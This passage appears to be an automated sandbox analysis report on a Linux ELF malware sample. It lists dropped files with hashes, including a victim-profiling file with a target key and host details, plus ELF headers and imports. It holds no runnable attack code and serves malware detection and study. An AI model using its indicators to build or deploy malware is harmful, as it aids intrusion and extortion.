                                File Type:data
                                Category:dropped
                                Size (bytes):1288
                                Entropy (8bit):7.784348124852347
                                Encrypted:false
                                SSDEEP:24:XT7NdC8pC+VEUlCcxO9cu4UZp4u/6Lnxd15c5DxCqBVcZjfXjR2iWO:VY8pCe1CX2dUTlidd1C5DxCqBAF1WO
                                MD5:832EFDDCB78113EBDFDBEDE5C488EC0E
                                SHA1:FC548C2C5789761B2D4D81C48DA48C15C138C882
                                SHA-256:2CCF81BD2DA2218B8BB86D5E733F676E2A54D0306110B9F7768733DC4CB97AA0
                                SHA-512:70E2EF8EEAC9D8F06B43EA9F61116C4FA607889702681F68EA070AE1A7D19C88BE3061E56CFE747B8D421D6C51273F179C2B8753B1FF4F785CE9632E0EDE4B3D
                                Malicious:false
                                Preview:.s.gaw.fh6.r.a.7jqhz...4u/.0....6...y......w},../k.#...1X$.BhR...a$~......Xh..7..`;,.%..X../u@o...M. ..IY....../R.{m..........4."|nM(...S......v....=\..V....9D......T:|xu.L.ko.S...<.....E...C..m.u.w.....@......W..#..O.V&...FIg.C.....> $.L.=...$~Th..an.-&...0z......X)...............jU..-.h..+'">c..@.l=v..."O..O....<7.<.wK..W4..l.{.9.l.....g.......5..!..g.)..gvk....U......#8.WX..qf=.p..f.c.{R.`..t...)...kY....o........c...).G.r...........|..wp..._.P?a.+..ze1.a(.@7ix.C.:N....?.I...5...;4.k.......e....{.B.+.h..]^4....C.A.(t..@.qm..B-}...m..T*...r.|.|.7.~..S.../ @!..`.M.....I4.7.. .{E.../.........I.k$.7.I.b...`.>../..l.>..t*.v&...\.........F....+sQ..x.....7..=..%B@..Z...r..x.8 .N..o.'.W.p.s.f3;g..B2}.K.S6...}6-....0Q|..E#...^.#..).C!.8K...;{......yP..6.@..^.C@.&;.E..>..'......Sw.....v..).{b.>..8.T..l ..Ki.......v.RYd.....K!...S.@.;..I..r.SZ.......s...H....ui....... ...L3R8..t.h...3..).E...~..}....*..B.N.}.u|..F....|!2.'....J.U_..$.......O.

                                /tmp/run_user_1000_gdm_Xauthority

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):2.0
                                Encrypted:false
                                SSDEEP:3:ukn:ukn
                                MD5:0AFB21A5F243EC6C489CE1033BD2C71D
                                SHA1:62EA23F71D0D21FB2EF63D9DE4B871F5B113D051
                                SHA-256:5E873C29AC18E151673593F7E7E1A5F72E952EA870B1AA3037740D722C963937
                                SHA-512:9C883309AADCDF36BE075438DC76BBFB0C2D33BD2466D11A34A6CAD0B9EB7542BAAC6EF46BF9431B9588FACBEA024928F3FCDA2ACEF098FBF62C26C153F04F1B
                                Malicious:false
                                Preview:.!2A

                                /tmp/run_user_127_gdm_Xauthority

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):2.0
                                Encrypted:false
                                SSDEEP:3:ukn:ukn
                                MD5:0AFB21A5F243EC6C489CE1033BD2C71D
                                SHA1:62EA23F71D0D21FB2EF63D9DE4B871F5B113D051
                                SHA-256:5E873C29AC18E151673593F7E7E1A5F72E952EA870B1AA3037740D722C963937
                                SHA-512:9C883309AADCDF36BE075438DC76BBFB0C2D33BD2466D11A34A6CAD0B9EB7542BAAC6EF46BF9431B9588FACBEA024928F3FCDA2ACEF098FBF62C26C153F04F1B
                                Malicious:false
                                Preview:.!2A

                                /tmp/server-0.xkm

                                Download File
                                Process:/usr/bin/xkbcomp
                                File Type:Compiled XKB Keymap: lsb, version 15
                                Category:dropped
                                Size (bytes):12040
                                Entropy (8bit):4.844996337994878
                                Encrypted:false
                                SSDEEP:192:QDyb2zOmnECQmwTVFfLaSLusdfVcqLkjoqdD//PJeCQ1+JdDx0s2T:QDyAxvYhFf+S62fzmp7/dMJ
                                MD5:AC37A4B84E9FB5FE9E63CE9367F31371
                                SHA1:E2D70CE4A01CB5F80F0C8B63EE856AE6FE8B0EFA
                                SHA-256:143E089EE7EB5E9BF088C19FC59A0EA7ED061AD3AE3E3CB5BC63BDFD86833DFF
                                SHA-512:3F683C4D4A3EEA88646E2BDB51BB79678B083944307811060AD0116773045F2D0245598E084310F8AC3934295E228D08B567FA6AA15FC3C9410B973AB4025664
                                Malicious:false
                                Preview:.mkx..............D.......................h.......<.....P.,%......|&......D.......NumLock.....Alt.....LevelThree..LAlt....RAlt....RControl....LControl....ScrollLock..LevelFive...AltGr...Meta....Super...Hyper...........evdev+aliases(qwerty)...!.....ESC.AE01AE02AE03AE04AE05AE06AE07AE08AE09AE10AE11AE12BKSPTAB.AD01AD02AD03AD04AD05AD06AD07AD08AD09AD10AD11AD12RTRNLCTLAC01AC02AC03AC04AC05AC06AC07AC08AC09AC10AC11TLDELFSHBKSLAB01AB02AB03AB04AB05AB06AB07AB08AB09AB10RTSHKPMULALTSPCECAPSFK01FK02FK03FK04FK05FK06FK07FK08FK09FK10NMLKSCLKKP7.KP8.KP9.KPSUKP4.KP5.KP6.KPADKP1.KP2.KP3.KP0.KPDLLVL3....LSGTFK11FK12AB11KATAHIRAHENKHKTGMUHEJPCMKPENRCTLKPDVPRSCRALTLNFDHOMEUP..PGUPLEFTRGHTEND.DOWNPGDNINS.DELEI120MUTEVOL-VOL+POWRKPEQI126PAUSI128I129HNGLHJCVAE13LWINRWINCOMPSTOPAGAIPROPUNDOFRNTCOPYOPENPASTFINDCUT.HELPI147I148I149I150I151I152I153I154I155I156I157I158I159I160I161I162I163I164I165I166I167I168I169I170I171I172I173I174I175I176I177I178I179I180I181I182I183I184I185I186I187I188I189I190FK13FK14FK15FK16FK17FK18

                                /tmp/stepdata.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):461
                                Entropy (8bit):5.44398768343762
                                Encrypted:false
                                SSDEEP:12:aWvhNmEwFBD4oNTFNW6YzvNrz08sksFA7lvsG4d:aWpNrCp4oNjXGF068Glvb4d
                                MD5:E39886ABF6C91DD6E4B21F113CD380AB
                                SHA1:641E46F999A86E68781FBB486FFA69E98E38350E
                                SHA-256:ED335A87DF6AB26D1D4B69095295F3BF57DADD67E15340BBA565BE071A0FA176
                                SHA-512:BF89D97F3764DEFF54001224525D2C3C6BB24F06D99000BFAEE892CCC9B17D9A5D3E9E6732B92E4DD6B410B47CB5392632539009C1A770993DE96F52CCF5848C
                                Malicious:false
                                Preview:hash: EA4EC50098D5E3A5284363606137C38100C9D4D907FB82C1C84A806588D1C977.key_of_target: C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.external_IP: 173.254.250.69.internal_IP: 173.254.250.69.hostname: galassia.username: saturnino.os: Ubuntu 20.04.2 LTS (Focal Fossa).locale: en_US.UTF-8.arch: x86_64.CPU_model_RAM_size: Intel(R) Xeon(R) Silver 4210 CPU @ 2.20GHz/3064296 kb.common_database_volume: 0.common_backups_volume: 0.common_vm_volume: 0.

                                /var/lib/AccountsService/users/gdm.Y24JW2

                                Download File
                                Process:/usr/lib/accountsservice/accounts-daemon
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):61
                                Entropy (8bit):4.66214589518167
                                Encrypted:false
                                SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                                MD5:542BA3FB41206AE43928AF1C5E61FEBC
                                SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                                SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                                SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                                Malicious:false
                                Preview:[User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.

                                /var/lib/gdm3/.cache/gdm/Xauthority

                                Download File
                                Process:/usr/lib/gdm3/gdm-x-session
                                File Type:X11 Xauthority data
                                Category:dropped
                                Size (bytes):104
                                Entropy (8bit):4.983294787198872
                                Encrypted:false
                                SSDEEP:3:rg/WFllasO93bkz5tNWFllasO93bkz5n:rg/WFl2LkvNWFl2LkV
                                MD5:7CD4A005163E3209906D68E2E51B52AE
                                SHA1:F1FC0DEE3C369D813ED3BD99FBAAEA9C926F4590
                                SHA-256:6105BA2B4E3CDE9F010A552BED0F6631FE0ED13113EAD59E7B453C4086706F73
                                SHA-512:F7721151EF4C9DBC5CF6A0EE2962F3C90F5DDA07EA4A324D5FD45656FE405B4176C482E0BC5F148911EABC96536175F944A07B5A0D8E4FBC76B4C3854286BFE4
                                Malicious:false
                                Preview:....galassia....MIT-MAGIC-COOKIE-1......,..^c.+...UJ....galassia....MIT-MAGIC-COOKIE-1......,..^c.+...UJ

                                /var/log/Xorg.0.log

                                Download File
                                Process:/usr/lib/xorg/Xorg
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):41599
                                Entropy (8bit):5.287086538349041
                                Encrypted:false
                                SSDEEP:384:ha4xtRMCTJMKdQdadOdkdAdqd7dXded+dQdXdLdNdPdjdgdmdNd6dSMdPidNqdH+:M4xsUyxgBu6XdrlOkv0lyM
                                MD5:2FC8B0CFD57998A341AAA243E66D5DA9
                                SHA1:36BF848E96CD1003AB4E998B10A80DB7E10C58E0
                                SHA-256:6D5B00A0CFB5E73F33250F349598BE8E8CED595D1562E909C01F4FD0E6D96236
                                SHA-512:E04239CDE2F5064D2B128752CD459603219593B6798353E3DF928B4205BB75FCCA9726D1D4343D02A41F3CC3230E1AD876CF67158AE450525BC3CDB40A581DC9
                                Malicious:false
                                Preview:[ 427.941] (--) Log file renamed from "/var/log/Xorg.pid-6374.log" to "/var/log/Xorg.0.log".[ 427.969] .X.Org X Server 1.20.11.X Protocol Version 11, Revision 0.[ 427.985] Build Operating System: linux Ubuntu.[ 427.995] Current Operating System: Linux galassia 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64.[ 428.006] Kernel command line: Patched by Joe: BOOT_IMAGE=/vmlinuz-5.4.0-72-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro maybe-ubiquity.[ 428.038] Build Date: 06 July 2021 10:17:51AM.[ 428.050] xorg-server 2:1.20.11-1ubuntu1~20.04.2 (For technical support please see http://www.ubuntu.com/support) .[ 428.060] Current version of pixman: 0.38.4.[ 428.069] .Before reporting problems, check http://wiki.x.org..to make sure that you have the latest version..[ 428.078] Markers: (--) probed, (**) from config file, (==) default setting,..(++) from command line, (!!) notice, (II) informational,..(WW) warning, (EE) error, (NI) not implemented, (??)

                                Static File Info

                                General

                                File type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, stripped
                                Entropy (8bit):6.2660463138040265
                                TrID:
                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                File name:Zc9eO57fgF.elf
                                File size:1'802'024 bytes
                                MD5:503c35c37d00d04ff2793c2b4bf5038f
                                SHA1:a03a9d06ca8441cb2ec7fe0c49cb56023130d884
                                SHA256:20e0e61d27762a524f6974fb9f4995062582db351d5576e62a214d6b5e5808e7
                                SHA512:c653fd4f8a6724b9a25e24e9a2a0152340be294d4d53d82e5762fd8599b014dabc4be6a2830822d51ce744ef256f1e5fe78b5c016fc24907de7ea964fb5835ee
                                SSDEEP:24576:94GdIhU6rF5IF0pGVZa4B6dmyw5DQ7EQ6LPni2Mt+aa:XShUL7VZ1BYZw5DcRt+a
                                TLSH:B8856A4AF7A768BEC193C430875BC5B3ED21B86552217D3B65C1EA302E62E204B6DF71
                                File Content Preview:.ELF..............>.......@.....@........x..........@.8...@.............@.......@.@.....@.@.....h.......h.................................@.......@...............................................@.......@......3.......3.......................@.......@@....

                                Static ELF Info

                                ELF header

                                Class:ELF64
                                Data:2's complement, little endian
                                Version:1 (current)
                                Machine:Advanced Micro Devices X86-64
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - Linux
                                ABI Version:0
                                Entry Point Address:0x40aa18
                                Flags:0x0
                                ELF Header Size:64
                                Program Header Offset:64
                                Program Header Size:56
                                Number of Program Headers:11
                                Section Header Offset:1800360
                                Section Header Size:64
                                Number of Section Headers:26
                                Header String Table Index:25

                                Sections

                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                NULL0x00x00x00x00x0000
                                .interpPROGBITS0x4002e00x2e00x1c0x00x2A001
                                .note.ABI-tagNOTE0x4002fc0x2fc0x200x00x2A004
                                .dynsymDYNSYM0x4008480x8480x11280x180x2A418
                                .dynstrSTRTAB0x4019700x19700x70f0x00x2A001
                                .gnu.version_rVERNEED0x4021f00x21f00xc00x00x2A458
                                .rela.dynRELA0x4022b00x22b00x900x180x2A308
                                .rela.pltRELA0x4023400x23400x10b00x180x42AI3228
                                .initPROGBITS0x4040000x40000xe0x00x6AX004
                                .pltPROGBITS0x4040100x40100xb300x100x6AX0016
                                .textPROGBITS0x404b400x4b400x14a44c0x00x6AX0016
                                .finiPROGBITS0x54ef8c0x14ef8c0x90x00x6AX004
                                .rodataPROGBITS0x54f0000x14f0000x172d40x00x2A0064
                                .eh_frame_hdrPROGBITS0x5662d40x1662d40xa3e40x00x2A004
                                .eh_framePROGBITS0x5706b80x1706b80x373a80x00x2A008
                                .gcc_except_tablePROGBITS0x5a7a600x1a7a600x72e90x00x2A004
                                .tbssNOBITS0x5afda80x1aeda80x100x00x403WAT008
                                .init_arrayINIT_ARRAY0x5afda80x1aeda80x500x80x3WA008
                                .fini_arrayFINI_ARRAY0x5afdf80x1aedf80x80x80x3WA008
                                .data.rel.roPROGBITS0x5afe000x1aee000x7a200x00x3WA0032
                                .dynamicDYNAMIC0x5b78200x1b68200x2200x100x3WA408
                                .gotPROGBITS0x5b7a400x1b6a400x5b80x80x3WA008
                                .got.pltPROGBITS0x5b80000x1b70000x5a80x80x3WA008
                                .dataPROGBITS0x5b85c00x1b75c00x2000x00x3WA0032
                                .bssNOBITS0x5b87c00x1b77c00xbd600x00x3WA0032
                                .shstrtabSTRTAB0x00x1b77c00xe50x00x0001

                                Program Segments

                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                PHDR0x400x4000400x4000400x2680x2681.99670x4R 0x8
                                INTERP0x2e00x4002e00x4002e00x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                                LOAD0x00x4000000x4000000x33f00x33f02.38660x4R 0x1000.interp .note.ABI-tag .dynsym .dynstr .gnu.version_r .rela.dyn .rela.plt
                                LOAD0x40000x4040000x4040000x14af950x14af956.25210x5R E0x1000.init .plt .text .fini
                                LOAD0x14f0000x54f0000x54f0000x5fd490x5fd495.86490x4R 0x1000.rodata .eh_frame_hdr .eh_frame .gcc_except_table
                                LOAD0x1aeda80x5afda80x5afda80x8a180x147782.96250x6RW 0x1000.tbss .init_array .fini_array .data.rel.ro .dynamic .got .got.plt .data .bss
                                DYNAMIC0x1b68200x5b78200x5b78200x2200x2201.62220x6RW 0x8.dynamic
                                NOTE0x2fc0x4002fc0x4002fc0x200x201.74870x4R 0x4.note.ABI-tag
                                TLS0x1aeda80x5afda80x5afda80x00x100.00000x4R 0x8.tbss
                                GNU_EH_FRAME0x1662d40x5662d40x5662d40xa3e40xa3e46.23110x4R 0x4.eh_frame_hdr
                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                                Dynamic Tags

                                TypeMetaValueTag
                                DT_NEEDEDsharedliblibrt.so.10x1
                                DT_NEEDEDsharedliblibpthread.so.00x1
                                DT_NEEDEDsharedliblibm.so.60x1
                                DT_NEEDEDsharedliblibc.so.60x1
                                DT_NEEDEDsharedlibld-linux-x86-64.so.20x1
                                DT_INITvalue0x4040000xc
                                DT_FINIvalue0x54ef8c0xd
                                DT_INIT_ARRAYvalue0x5afda80x19
                                DT_INIT_ARRAYSZbytes800x1b
                                DT_FINI_ARRAYvalue0x5afdf80x1a
                                DT_FINI_ARRAYSZbytes80x1c
                                DT_HASHvalue0x4003200x4
                                DT_GNU_HASHvalue0x4008100x6ffffef5
                                DT_STRTABvalue0x4019700x5
                                DT_SYMTABvalue0x4008480x6
                                DT_STRSZbytes18070xa
                                DT_SYMENTbytes240xb
                                DT_DEBUGvalue0x00x15
                                DT_PLTGOTvalue0x5b80000x3
                                DT_PLTRELSZbytes42720x2
                                DT_PLTRELpltrelDT_RELA0x14
                                DT_JMPRELvalue0x4023400x17
                                DT_RELAvalue0x4022b00x7
                                DT_RELASZbytes1440x8
                                DT_RELAENTbytes240x9
                                DT_VERNEEDvalue0x4021f00x6ffffffe
                                DT_VERNEEDNUMvalue50x6fffffff
                                DT_VERSYMvalue0x4020800x6ffffff0
                                DT_NULLvalue0x00x0

                                Symbols

                                NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                _ITM_RU1.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                _ITM_RU8.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                _ITM_addUserCommitAction.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                _ITM_memcpyRnWt.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                _ITM_memcpyRtWn.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                _ZGTtdlPv.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                _ZGTtnam.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                __ctype_get_mb_cur_max.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __ctype_tolower_loc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __cxa_atexit.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __duplocale.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __errno_location.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __freelocale.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __fxstat64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                __iswctype_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __libc_start_main.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __newlocale.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __nl_langinfo_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __pthread_key_create.dynsym0x4049900FUNC<unknown>DEFAULTSHN_UNDEF
                                __strcoll_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __strftime_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __strtod_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __strtof_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __strxfrm_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __tls_get_addr.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __towlower_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __towupper_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __uselocale.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __wcscoll_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __wcsftime_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __wcsxfrm_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __wctype_l.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __xstat.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                __xstat64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                abort.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                bind_textdomain_codeset.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                bindtextdomain.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                btowc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                clock_gettime.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                close.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                closedir.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                connect.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                dgettext.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                dl_iterate_phdr.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                endmntent.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                exit.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fclose.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fcntl.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fdopen.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fflush.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fileno.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                flock.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fopen.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fopen64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fputc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fputs.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fread.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                free.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                freeifaddrs.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fseek.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fseeko64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fsync.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                ftell.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                ftello64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                ftruncate64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                fwrite.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                get_nprocs.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getenv.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                gethostbyname.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                gethostname.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getifaddrs.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getlogin_r.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getmntent.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getnameinfo.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getpid.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getsockopt.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getuid.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                getwc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                gmtime_r.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                iconv.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                iconv_close.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                iconv_open.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                inet_pton.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                ioctl.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                isspace.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                iswspace.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                kill.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                log.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                lseek64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                malloc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                mbrtowc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                mbsnrtowcs.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                mbsrtowcs.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                memchr.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                memcmp.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                memcpy.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                memmove.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                memset.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                mkdtemp.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                nanosleep.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                open.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                open64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                opendir.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                poll.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pow.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                printf.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_cond_broadcast.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_cond_destroy.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_cond_init.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_cond_signal.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_cond_wait.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_create.dynsym0x4044300FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_detach.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_getspecific.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_join.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_key_create.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_key_delete.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_mutex_destroy.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_mutex_init.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_mutex_lock.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_mutex_unlock.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_once.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                pthread_setspecific.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                putc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                puts.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                putwc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                read.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                readdir.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                readdir64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                readlink.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                realloc.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                recv.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                remove.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                rename.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                send.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                setlocale.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                setmntent.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                setvbuf.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                sleep.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                socket.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                sprintf.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                statvfs64.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                stderr.dynsym0x5b87c08OBJECT<unknown>DEFAULT27
                                stdin.dynsym0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                                stdout.dynsym0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                                strcasecmp.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strchr.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strcmp.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strdup.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strerror.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strlen.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strncmp.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strncpy.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strstr.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                strtol.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
